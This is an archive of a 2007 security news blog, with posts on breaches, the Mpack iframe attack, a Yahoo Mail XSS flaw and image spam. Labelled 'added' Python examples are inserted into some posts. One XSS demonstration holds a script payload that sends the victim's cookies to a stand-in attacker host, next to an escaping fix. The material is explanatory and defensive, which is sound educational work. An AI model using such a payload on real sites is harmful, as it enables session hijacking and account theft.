Wednesday, June 27, 2007

Keeping Kids Safe Online

Information Week ran two articles this week about online safety for kids at school and on MySpace.

They referenced two good reports from Webroot and from the Pew Internet project.

Triple Header for Laptop Thefts

The SANS NewsBites newsletter reported yesterday on three laptop thefts with significant data breaches:

The State of Ohio, Prince Charles and Texas First Bank were the winners in the drawing.

Guard those laptops.

Security Geeks on Crack

This is a humorous but to-the-point post by Michael Farnum on his Computer World blog. He said security professionals need to stop worshipping gadgets and focus on the business side over the technical side of security.

He quoted Rational Security, a fascinating blog covering the philosophical side of IT security, among other things. It's a real meaty, in-depth and thought-provoking blog that I highly recommend.

Farnum wrote more about the matter in a prior blog post.

Tuesday, June 26, 2007

A Buffer Overflow in Java?

Who said Java had no buffer overflows? I have, for one. I've qualified that by also saying that while Java itself bounds-checks its buffers, a Java front end can still pass an oversized input along to a susceptible back-end system written in C or assembler.

Here's a Secunia advisory about a buffer overflow in the JDK, a bit different, but worth noting nonetheless.

PCI at the Gas Pump

This is scary for anyone who drives a car and fills up their gas tank, which, I guess, is everybody.

A Gartner report cited by Computer World says the point-of-sale (POS) devices at most pumps store credit card data that could easily be filched by a hacker. It said there's enough data, and it's sent over insecure wireless networks and the Internet, to create duplicate cards. Companies are using the Internet for the POS devices instead of dial-up networks.

Further, the wireless connections use Wired Equivalent Privacy (WEP), which is a weak form of encryption.

More on Mpack and Porn Sites

It seems the Mpack attack, responsible for the Italian Job exploit last week, is now infecting porn sites.

This article in Computer World cites security experts who say most of the vulnerable web servers were running Apache.

Although the number of infected porn sites is smaller than the 10,000 sites hacked in the Italian Job, more users have been infected.

Saturday, June 23, 2007

Pirillo's Wireless Security Video

This is a real nice video from Chris Pirillo about securing your wireless network. He suggests using MAC address filtering. It's not long, only a few minutes, and can be embedded in your blog, like this:

http://live.pirillo.com/ / http://chris.pirillo.com/media/

New Group of ATE Questions Posted

I just noticed that SearchSecurity posted my next group of five Ask The Expert questions on identity and access management:

What challenges arise when designing a logging mechanism for peer-to-peer networks?
This question posed on 30 May 2007

What are the potential risks of giving remote access to a third-party service provider?
This question posed on 20 May 2007

Should void user IDs be preserved in an audit history?
This question posed on 15 May 2007

What are the best security practices for securing sensitive data on PDAs?
This question posed on 11 May 2007

Is there any policy or regulation to help protect biometric data?
This question posed on 02 May 2007

US Government Security Full of Holes

The US government took it on the chin this week after a House panel slammed DHS CIO Scott Charbo for the agency's IT security record.

In his Security Strategies newsletter on Network World's site, Prof. Mich Kabay has been running a series about the VA incident last year and its aftermath.

Kabay cited a report by the Committee on Oversight and Government Reform giving federal agencies low marks in IT security.

Wednesday, June 20, 2007

Security Awareness Videos

Here's some nice security awareness videos posted to the Yahoo Security Awareness group.

This is a collection of videos from the office of the CIO of British Columbia.

The following were posted by Scott Pinzon of WatchGuard Technologies:

How Password Crackers Work

Spyware: Think Before You Click

Malware Analysis: Rootkits, Part 1

Malware Analysis: Rootkits, Part 2

Malware Analysis: Rootkits, Part 3

Microsoft also has a series of videos on home computer security.

List of Recent Security Company Acquisitions

After SPI Dynamics announced its acquisition yesterday by HP, the Associated Press had an interesting story about the recent wave of security company mergers.

The AP article said standalone security companies were basically all on the block for sale and disappearing rapidly. They said security was fast becoming a standard part of tech companies, who were gobbling up what they could in the security market.

Computer World also summarized the AP story in this blog post.

42 HIPAA Audit Points

This is a nice checklist from Computer World of 42 points a HIPAA auditor might look for.

Even though HIPAA -- the Health Insurance Portability and Accountability Act -- applies to health care institutions and companies, the confidential customer data they're supposed to protect is all the same.

Finance or health, they all have our data, and they all need to protect it.

Tuesday, June 19, 2007

The Italian Job Hack

As someone who speaks Italian, I frequent Italian web sites as one way to practice the language, and, as a result, find the recent Italian Job hack personally troubling.

The hack got its name from Trend Micro, which reported it yesterday. There are screen shots of an affected site with a sample of the malicious code embedded in an IFRAME tag.

The attack started from a network of at least 10,000 hacked web sites based in Europe. Visitors to the sites were redirected to servers hosting Mpack, a malware kit developed by Russian hackers. Mpack loads keystroke logging software that scouts the user's computer for user IDs and passwords for online banking web sites.
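The tell-tale artifact in this attack, as the Trend Micro screen shots show, is an IFRAME tag injected into an otherwise legitimate page, pointing visitors at the Mpack server. The following is an added example, not code from the original post or from any of the vendors mentioned, of a small scanner a site owner could run over their own pages to spot such injections. It assumes that an injected frame points to a host other than the site's own and is usually hidden (zero width/height or display:none); the hidden-frame heuristic and the sample page with its 203.0.113.7 address are constructed for illustration, not details from the advisories.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: one legitimate on-site widget frame and one
# injected, hidden frame pointing at an outside host (documentation address).
SAMPLE_PAGE = """<html><body>
<h1>Benvenuti</h1>
<iframe src="/widgets/meteo.html" width="300" height="200"></iframe>
<iframe src="http://203.0.113.7/in.cgi?3" width="0" height="0" style="display:none"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a page."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_zero_size(attrs) -> bool:
    """True if width or height is explicitly 0 (a common way to hide a frame)."""
    for key in ("width", "height"):
        raw = attrs.get(key, "").strip().lower().removesuffix("px").strip()
        if raw.isdigit() and int(raw) == 0:
            return True
    return False


def find_suspicious_iframes(page_html: str, page_host: str) -> list:
    """Return the src of each iframe that points off-site or is hidden.

    page_host is the hostname the page was served from; a relative src
    is treated as on-site.
    """
    parser = IframeCollector()
    parser.feed(page_html)
    hits = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or page_host
        off_site = host.lower() != page_host.lower()
        style = attrs.get("style", "").replace(" ", "").lower()
        hidden = _is_zero_size(attrs) or "display:none" in style
        if off_site or hidden:
            hits.append(src)
    return hits


if __name__ == "__main__":
    for src in find_suspicious_iframes(SAMPLE_PAGE, "www.example.it"):
        print("suspicious iframe:", src)
```

Run it over a crawl of your own pages with the real hostname; a legitimate off-site frame (an ad network, say) will also show up, so treat the output as a review list rather than a verdict.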

Details about Mpack can be found on Symantec's web site with more specific information about the Italian attack posted there, as well. Websense also issued an alert.

Ryan Naraine's Zero Day blog has more background information about the exploit.

What's interesting is that the root cause is compromised web servers at one of Italy's biggest ISPs. But no one has explained how those servers were compromised in the first place. If those servers hadn't been compromised, this attack would have been thwarted.

This story was also reported in Computer World and eWeek.

I returned last month from a two-week trip to Italy.

Wireless Security Tips

This article in the Windows Secrets newsletter by Scott Dunn has some good tips about wireless security at public hot spots.

Though a year old, Kim Komando also has a guide on wireless security, which I'd say is still current.

HP Acquiring SPI Dynamics

SearchSecurity reported today that HP is buying SPI Dynamics, the creator of the WebInspect web scanning tool. WebInspect is a top-of-the-line product for developers to find security holes in their web sites.

SPI Dynamics has both a web site and blog with information on exploits against web sites.

Sunday, June 17, 2007

BugHunter v2.2c Just Released

BugHunter, a free malware removal tool, just released its latest version, 2.2c, this week.

It's available for download from the BugHunter web site.

A quick glance at the list of malware it blocks shows an impressive list of spyware, Trojans and other general nasties. Here's a list of new malware just added in the latest release on June 13.

As you can see from this screenshot, it's pretty basic and easy to use:


Friday, June 15, 2007

Yahoo Mail XSS Vulnerability

Here are some details about an XSS vulnerability in Yahoo Mail on the Net Cookies blog.

The posting has two sets of code, one to be hosted on a web server and the other, a Ruby script, for generating links to the Yahoo vulnerability. The attacker then runs the address of the hosted code through the Ruby script.

This isn't rocket science. It's a textbook XSS exploit, where XSS is used to steal a cookie, send it to the hacker's server, where it's used to hack the victim's session.
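To make the "textbook" part concrete, here is an added example (my own illustration, not the Net Cookies code or anything from Yahoo) of the pattern in miniature: a page that reflects a parameter into HTML without escaping, the kind of link an attacker would craft, the cookie-stealing payload, and the one-line fix of escaping on output. The hostnames, the parameter name and the payload are all constructed for the example.

```python
import html
import re
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed cookie-stealing payload of the kind the post describes: when it
# runs in the victim's browser it ships document.cookie to the attacker's host.
PAYLOAD = "<script>new Image().src='http://attacker.invalid/c?'+document.cookie</script>"

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def craft_link(base_url: str, payload: str) -> str:
    """Build the link an attacker would send, with the payload in the 'name' parameter."""
    return base_url + "?" + urlencode({"name": payload})


def name_from_link(url: str) -> str:
    """What the vulnerable server reads back out of the query string."""
    return parse_qs(urlparse(url).query).get("name", [""])[0]


def render_unsafe(display_name: str) -> str:
    """Vulnerable: untrusted input is spliced straight into the HTML."""
    return f"<p>Welcome, {display_name}!</p>"


def render_safe(display_name: str) -> str:
    """Hardened: HTML-escape on output so the payload is rendered as text."""
    return f"<p>Welcome, {html.escape(display_name, quote=True)}!</p>"


def contains_script(page: str) -> bool:
    """Crude check used here only to show whether a live <script> tag survived."""
    return bool(SCRIPT_TAG.search(page))


if __name__ == "__main__":
    link = craft_link("http://mail.example.invalid/inbox", PAYLOAD)
    name = name_from_link(link)
    print("unsafe page executes script:", contains_script(render_unsafe(name)))
    print("safe page executes script:  ", contains_script(render_safe(name)))
```

Escaping on output is the whole fix for reflected XSS of this kind; marking the session cookie HttpOnly limits what a successful injection can read but does not remove the injection.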

The post has a lot of detail not only about the exploit but about the apathy of the developer community toward XSS despite how rampant a problem it is.

It's that easy.

Consumer Devices and Network Security

This is a nice summary from Information Week of the various security issues around consumer devices (blogs, IM and MP3 players) used by employees at their companies.

This isn't news -- these household toys make a joke out of perimeter security -- but the article covers all the major concerns surrounding the issue.

It also argues for better Network Access Control (NAC), a controversial issue itself right now. But that'll be for another post.

Thursday, June 14, 2007

Denial of Service Attacks Aren't Worth It Anymore

This is an interesting item from Symantec analyzing why Denial of Service (DoS) attacks aren't worthwhile anymore.

Basically, Symantec is saying that most DoS attacks come from botnets. If the bot herder isn't careful, a prolonged DoS attack can expose the bot controller. Once the controller is found, it can be taken down. The result: a DoS attack can lead to the bot herder losing the entire bot.

Legitimate Sites Hiding Child Porn

This is scary. The anti-virus vendor Sophos reported that cybercriminals are injecting malware into legitimate sites, along with links to child pornography sites.

This was reported yesterday in Information Week.

FBI Arrests Bot Herders

The FBI announced yesterday that it had arrested or charged three alleged bot herders. The three were caught under the FBI's Operation Bot Roast, a national operation that uncovered over one million victimized IP addresses.

One of the three was caught by the FBI office here in Chicago, according to their press release.

Details about the bot herders were reported today in Computer World. More information about the operation itself was in another Computer World article, also today.

Wednesday, June 13, 2007

PCI Compliance Blog

I ran across this blog devoted entirely to Payment Card Industry (PCI) compliance. For anyone going through this maze, this blog has some nice tips.

I've written two articles for SearchSecurity on PCI, one in March, the other in May.

CSO Article on Web Application Security

CSO magazine ran an article about what it called the "murky world" of web application security.

It talked about some of the issues surrounding web application testing and ethical hacking.

Acunetix Releases WVS v5

Acunetix announced this week that it released Web Vulnerability Scanner v5. It said the new tool will help companies be compliant with the Payment Card Industry (PCI) standard.

This was also reported on Lockergnome.

Acunetix has an online Web Site Security Center.

Comodo Rated Best Personal Firewall

Lockergnome, in a recent review, cited Comodo as the best personal firewall.

There's also a link on my personal site. Click on Firewalls in the left hand navigation bar.

Privacy International Slams Google and Others

In its 2007 Interim Rankings, Privacy International gave Google a "Hostile to Privacy" ranking.

The six-page report wasn't particularly favorable to most large Internet service companies, giving only a handful the ranking of "Generally Privacy Aware." Even this ranking would be considered a "B," since no one got the highly coveted "Privacy-Friendly" ranking, the "A" on their report card.

The report cited Google for collecting sensitive data about customers' searches, storing the data for up to 24 months, having a deceptive privacy policy and being evasive about customer complaints.

Privacy International is a human rights group dedicated to fighting abuses of privacy and surveillance by governments and corporations. Its work is mostly in the high-tech side of these issues.

Even though Google got thrashed, nobody really comes off clean in this report.

Shame on everybody.

Monday, June 11, 2007

Compliance Doesn't Equal Security

This is a great blog post by Computer World's Michael Farnum about how compliance doesn't equal security. I agree with him one hundred percent.

Too many companies are bending and bowing to auditors and regulators at the expense of implementing true security controls. They do what they're told -- or forced to do -- rather than what makes information security sense.

Farnum says there's no substitute for good old-fashioned best security practices and following frameworks like COBIT and the ISO standards. Following these practices will automatically make a company compliant.

Securing Your Mac

Here's a nice article from Information Week with tips on securing your Mac.

I've written some other posts about Mac security.

My SearchSMB Article on Laptop Security

My article on laptop security came out today on SearchSMB. The article is mostly about physical and administrative security. It talks, for example, about protecting laptops from theft and, if they're stolen, how to protect the data on them.

Here's another recent article from Enterprise Security Today, which expands on the subject. It covers some items I didn't touch in my brief piece. Their article talks about how many corporate laptop users are reckless and engage in risky behavior with their laptops, both online and otherwise.

Sunday, June 10, 2007

April Ask The Expert Questions Posted

My ATE questions on SearchSecurity from April were just posted, and here they are:

Is the use of digital certificates with passwords considered two-factor authentication?
This question posed on 30 April 2007

How to test an enterprise single sign-on login
This question posed on 23 April 2007

What's the best way to verify client authentication across unrelated Web servers?
This question posed on 16 April 2007

Creating a personal digital certificate
This question posed on 11 April 2007

Is there an identity management software product for audit and analysis?
This question posed on 02 April 2007

Microsoft MVP Demonstrates WEP Break-In

At TechEd 2007 last week in Orlando, Microsoft MVP Marcus Murray demonstrated how to break into a wireless network secured by WEP.

He once again showed how easy it is to crack WEP.

A group of German researchers made headlines in April when they cracked WEP in a matter of minutes.

Thursday, June 07, 2007

Yahoo Messenger Vulnerabilities

The CIMIP Identity Theft Research Center

This is a nice piece in Prof. Mich Kabay's Network World column about the Center for Identity Management and Information Protection (CIMIP) at Utica College.

There's lots of good information about research into identity theft.

Keeping Organized Crime Out of Your Network

This is an interesting article on the IT Security web site about keeping your network crime free.

It's interesting because it really is just a nice concise summary of routine security procedures. So what's so special about organized crime? How does it differ from any other network intrusion? It doesn't. They're all the same, and all of them can be prevented if you follow the steps in the article.

Cyberwarfare in Perspective

Cyberwarfare isn't what it's cracked up to be. In this Information Week blog post yesterday, Patricia Keefe makes some interesting points and puts it in perspective.

Terrorists are like spoiled children looking for attention. They're also pyromaniacs. They like bonfires and burning buildings (think 9/11). Burning things attract far more attention and are so much more macho than some wimpy network slowdown.

Keefe asked if the recent cyberattack on Estonia really caught people's attention. She said it really didn't.

That doesn't mean that cyberattacks against our infrastructure won't happen, or aren't serious. But Keefe makes the point that businesses, who are the main target, should take the old-fashioned approach -- beef up their disaster recovery and business continuity planning.

Being prepared is what makes the most sense, not fretting over what might or might not happen.

Wednesday, June 06, 2007

Security Cameras and Paraphernalia

I get a lot of unsolicited mail from security companies, but this one tops them all.

I got a catalog today from Super Circuits, which sells a whole array of security cameras. They include cameras hidden in clocks and hats, among other things.

I have to wonder if this stuff is legal for civilians and those not in law enforcement.

FFIEC Guidelines and Passwords

The Federal Financial Institutions Examination Council (FFIEC) issued a guideline in 2005 recommending that banks offer two-factor authentication for all their online customers. They said user IDs and passwords, by themselves, were insufficient and could be easily cracked.

According to CSO, many banks still aren't compliant. In their Alarmed column, Sarah Scalet called three banks to inquire about their authentication policies and practices and got some interesting responses.

They also reported more bad news about passwords.

The Acquisition March Keeps On Going

Acquisitions of security vendors continued apace with the announcement this week of RSA's purchase of Verid, IBM's purchase of Watchfire, and more speculation all around of who's next.

Some More Google Stuff

Computer World reported yesterday that Microsoft IIS web servers were more prone to hosting malicious code. The results were in a blog posting by Nagendra Modadugu of Google's Anti-Malware Team.

But if you take a closer look at his results, Apache also hosts its share of malware. It would be more accurate to say the results are dependent on geography, meaning where the server is located. In Russia and Germany, Apache was a bigger culprit, while in Asia IIS was the bad guy.

Modadugu speculated that the culprit in Asia was pirated software -- bootleg IIS copies that weren't patched and that, of course, couldn't use Microsoft's automatic update feature to stay clean.

In another unrelated report, a flaw was found in Google Desktop similar to the Firefox exploit uncovered a day earlier.

My Compliance Counselor Article on SearchSecurity

My article on best practices for compliance during a merger came out today in SearchSecurity's Compliance Counselor newsletter.

I described some best practices for how two companies during a merger, at different stages of the compliance process, can reach the same level of compliance.

Cybercriminals Hide Behind Anti-Forensics

This is a scary article in CIO magazine about how cybercriminals are using anti-forensics to hide their tracks.

Anti-forensics is using tools that defeat forensics analysis. The point is not just to intrude but to hide your tracks.

Tuesday, June 05, 2007

Spam Unabated Despite Arrest

The spam just keeps on coming, despite the arrest of an alleged spam king last week. Here's why.

A recent MessageLabs report said "spam spikes" against individual domains were on the upswing. It said this continued a trend toward targeted attacks.

Large companies were also a source of spam, according to this report.

Latest Ask The Expert Questions on SearchSecurity

Search Engine Security

Information Week reported this week about Google's purchase of GreenBorder Technologies, an anti-virus vendor. The article speculated that Google is moving into the enterprise security area.

In a related development, McAfee also released its State of Search Engine Safety report this week. Among the results are that music and technology sites posed the highest risk of hosting spyware or other malicious code.

Two New NIST Publications

Sunday, June 03, 2007

New Mac and Firefox Vulnerabilities

The Mac came under attack again this week for a vulnerability in Samba file sharing and a buffer overflow, all part of a total of 17 flaws patched this week.

But eWeek's David Morgenstern came to the venerable old Mac's defense in this column.

Firefox, another favorite of the security community, also came under scrutiny for vulnerabilities to its add-ons and through Google Desktop.

Cyberwarfare Gets Nasty

Two reports about cyberwarfare, one about China and the other about Estonia, came out this week.

Computer World and PC World had articles about China building up its cyberwarfare capability and actually writing attack viruses. The articles cited a Pentagon report assessing Chinese military strengths.

The Economist reported on attacks on Estonian web sites, supposedly by Russian hackers, which was denied in another story in Network World.

Information Week had an interesting piece on both attacks and the overall impact of cyberwarfare.

Tool to Protect Privacy

This is a web site offering a service to supposedly clean up your reputation from malicious web postings.

ReputationDefender was mentioned in Prof. Mich Kabay's recent Security Strategies newsletter.

Article on Web 2.0 Security

PC World ran an article in its July issue about Web 2.0 security.

Expect more on this as more applications and services migrate to the web. The possibility now exists for things like XSS to break into critical systems and databases. Before, when these systems weren't web-based applications, they weren't susceptible to web attacks.

Now, they are.

Interesting Cyberscams

This is an interesting story about a "one-cent" scam where fraudsters pinged for active accounts on the automated clearinghouse system. The crooks then deposited a penny and then authorized withdrawals.

In another case, cyberthieves dropped Trojans on computers in the offices of the city of Carson, California, and made off with close to a half million dollars.

Both incidents are still under investigation.

More on Wireless and Mobile Threats

Security of wireless and mobile devices isn't anything new. It's been talked about a lot over the last few years. But here's an article in Computer World about five reasons it could get worse.

Here's another article on MSN about how wireless exploits may have been part of the recent highly-publicized TJX breach.

This is how an Oregon hospital faced the issue head on.

Image Spam Article

Here's an in-depth piece in CSO magazine about image spam.

Embedding spam into images has been a favorite tactic recently of spammers trying to avoid filtering software. Most spam filters are looking for keywords, not images, allowing an e-mail message consisting of only an image to pass through. The filter can't tell the image is a picture of a spam message.
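The evasion works because a keyword filter only sees the text parts of a message, and an image-only message has almost none. The following is an added example of my own, not code from the CSO piece or any filtering product, showing a naive keyword filter missing a constructed image-only message and a simple structural check catching it: flag messages that carry an image part but fewer than a handful of visible words. The two sample messages, the addresses and the keyword list are constructed for the example; the word threshold is an assumption you'd tune against real mail.

```python
import re
from email import message_from_string
from email.message import Message

# Constructed sample: the text part is just a wrapper around an inline GIF,
# which is the shape of image spam the column describes.
IMAGE_SPAM = """\
From: promo@example.net
To: you@example.com
Subject: hi
MIME-Version: 1.0
Content-Type: multipart/related; boundary="b1"

--b1
Content-Type: text/html

<html><body><img src="cid:pic1"></body></html>
--b1
Content-Type: image/gif
Content-ID: <pic1>
Content-Transfer-Encoding: base64

R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
--b1--
"""

# Constructed sample of an ordinary text message for comparison.
PLAIN_MAIL = """\
From: alice@example.com
To: you@example.com
Subject: lunch
Content-Type: text/plain

Want to grab lunch at noon? Here is the agenda for the meeting afterwards.
"""

TAG = re.compile(r"<[^>]+>")


def visible_text(msg: Message) -> str:
    """Collect the human-readable text of a message, with HTML tags stripped."""
    chunks = []
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype in ("text/plain", "text/html"):
            payload = part.get_payload(decode=True) or b""
            text = payload.decode(part.get_content_charset() or "utf-8", "replace")
            if ctype == "text/html":
                text = TAG.sub(" ", text)
            chunks.append(text)
    return " ".join(chunks)


def image_parts(msg: Message) -> int:
    """Count the image/* MIME parts in a message."""
    return sum(1 for p in msg.walk() if p.get_content_maintype() == "image")


def keyword_filter(raw: str, keywords=("pharmacy", "stock tip")) -> bool:
    """The naive keyword filter the column says image spam evades."""
    text = visible_text(message_from_string(raw)).lower()
    return any(k in text for k in keywords)


def is_image_only(raw: str, min_words: int = 5) -> bool:
    """Structural check: an image part plus almost no visible words."""
    msg = message_from_string(raw)
    words = visible_text(msg).split()
    return image_parts(msg) > 0 and len(words) < min_words


if __name__ == "__main__":
    print("keyword filter catches image spam:", keyword_filter(IMAGE_SPAM))
    print("structural check catches image spam:", is_image_only(IMAGE_SPAM))
    print("structural check flags plain mail:", is_image_only(PLAIN_MAIL))
```

A newsletter that is genuinely one big graphic will trip the structural check too, so in practice it's a scoring input alongside sender reputation rather than a hard block.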

A "Safe" Domain for Banks and More on Phishing

Now here's an interesting concept, a new domain specifically for banks. The domain would be ".safe" and would supposedly protect customers from phishing sites.

The domain would supposedly be locked down to keep non-banks from registering domains. An interesting concept in theory, but I'm not sure how it would actually prevent someone from fraudulently posing as a bank to register a bogus URL in the .safe domain.

This proposal follows on a report by the Anti-Phishing Working Group saying the number of phishing sites skyrocketed in April.

Dell was hit by a phishing attack that was reported on PC Magazine's web site and by AusCERT, the Australian branch of CERT.

This is an article in Computer World about a new specification for DomainKeys Identified Mail (DKIM) to fight phishing.

Thoughts on Google Security

The IT Security web site had an interesting post last month about Google security.

There was also a comparison of Google and Microsoft security in a slide show comparing the two companies on eWeek.

There were two other articles in eWeek, one about people clicking on anything, including an ad that claims to infect their PCs with a virus, and Google's response. The article reports on a study from Google about the dangers of drive-by downloads of malicious code planted on seemingly innocuous web sites.

This really isn't news and has been a growing problem recently. But the Google study goes into quite a bit of depth and is pretty comprehensive. The story was also reported in Techworld.

This is just some food for thought as Google grows into new areas and faces new security challenges and issues. Some of these, to be sure, weren't expected when the company started out solely as a search engine.

Arrested for Accessing Free Wi-Fi

A man in Michigan was arrested for accessing free wi-fi service from his car. The service was being offered by a local cafe, but the man wanted to access it from the comfort of his car, which he apparently did often.

But, under Michigan law, since he didn't get permission from the cafe to use their service, he was legally liable.

The story was reported on the ars technica web site and WOOD TV in Grand Rapids, Michigan.

Study About Internet Censorship

The OpenNet Initiative released a report recently, saying that at least 25 countries censor Internet usage.

The story was reported in May in My Way News and the BBC. I also had a post last November on privacy and Internet censorship.

More results of the study will be published in a book from MIT Press, Access Denied, scheduled for release in November.

Saturday, June 02, 2007

Article on Web Security Testing

There was a nice article on web security testing tools on SearchSoftwareQuality by Kevin Beaver.

It mentioned an interesting tool, Absinthe, for pulling data out of a database through blind SQL injection.

IronPort Revamps SenderBase Site

IronPort revamped its SenderBase web site recently to be a comprehensive portal of virus, e-mail, spam and other web-based threats.

It's a nice site worth taking a look at.

This was reported in an eWeek article.

MySpace Getting Tough on Sex Offenders

MySpace has offered to provide data on sex offenders to the authorities, according to these recent articles in The Denver Post and The New York Times.

MySpace has a web page devoted to security, and there's an independent blog, MyCrimeSpace, which tracks malicious activity on the site.

Social networking sites, in general, have been the focus of security concerns, not just on the privacy front but also for, at times, hosting malicious code.

The privacy issue revolves around posters who put personal information, or information that could be used to stalk someone, on their profile.

New Web Site on Information Security Standards

A new web site, InfoSecMinds, was launched last month about information security standards and management best practices.

It looks interesting and might be worth following.

Ubuntu Security Resource

The IT Security web site, an outstanding resource in its own right, had a nice article about Ubuntu Linux security. Ubuntu is the hottest Linux distro these days, and this piece focuses specifically on Ubuntu security.

I wrote an article for SearchSMB last year about Linux security. It was much more general and only scratched the surface of this complex topic.

WindowsSecrets Guide to Home Computer Security

WindowsSecrets, a weekly newsletter for home users about -- you guessed it -- Windows, recently published a blurb about security for home computers.

They listed three essential points, which are detailed in the article:
  1. Hardware firewall
  2. Security suite
  3. Update management
It's a bit simplistic, but I can't argue with their main points.

Some of you may remember the outstanding Langa List. Well, Langa merged his list and reincarnated it as WindowsSecrets.

IM Security for SMBs

I just got back a few days ago from my trip to Italy and am just starting to catch up.

I saw this week that SearchSMB ran my article on IM security best practices for SMBs.

To view the article, you'll need to register with SearchSMB. It's worthwhile, since they have articles about all kinds of topics of interest to SMBs, not just about security.

SearchSMB is part of the TechTarget group of web publications, which includes SearchSecurity, another site I write for.